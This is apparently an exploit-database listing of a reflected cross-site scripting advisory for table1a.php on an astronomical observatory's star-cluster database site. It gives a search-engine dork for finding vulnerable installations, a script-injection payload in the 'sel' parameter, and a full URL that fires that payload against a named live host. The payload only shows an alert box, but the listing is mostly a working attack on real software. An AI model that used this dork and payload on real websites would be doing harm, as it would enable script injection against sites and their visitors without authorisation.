Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-79 | Not specified | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Marco Castellani | High | Remote | 2019-03-22 |
==================================================================================================================================== | # Title : Database compilation by Marco Castellani XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 65.0.2(32-bit) | | # Vendor : http://www.oa-roma.inaf.it/ | | # Dork : "Database compilation by Marco Castellani( INAF - Astronomical Observatory of Rome)" | ==================================================================================================================================== poc : [+] Dorking n Google Or Other Search Enggine. [+] Use payload : /table1a.php?sel=<script>alert(/indoushka/);</script> [+] http://gclusters.altervista.org//table1a.php?sel=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================
Copyright ©2024 Exploitalert.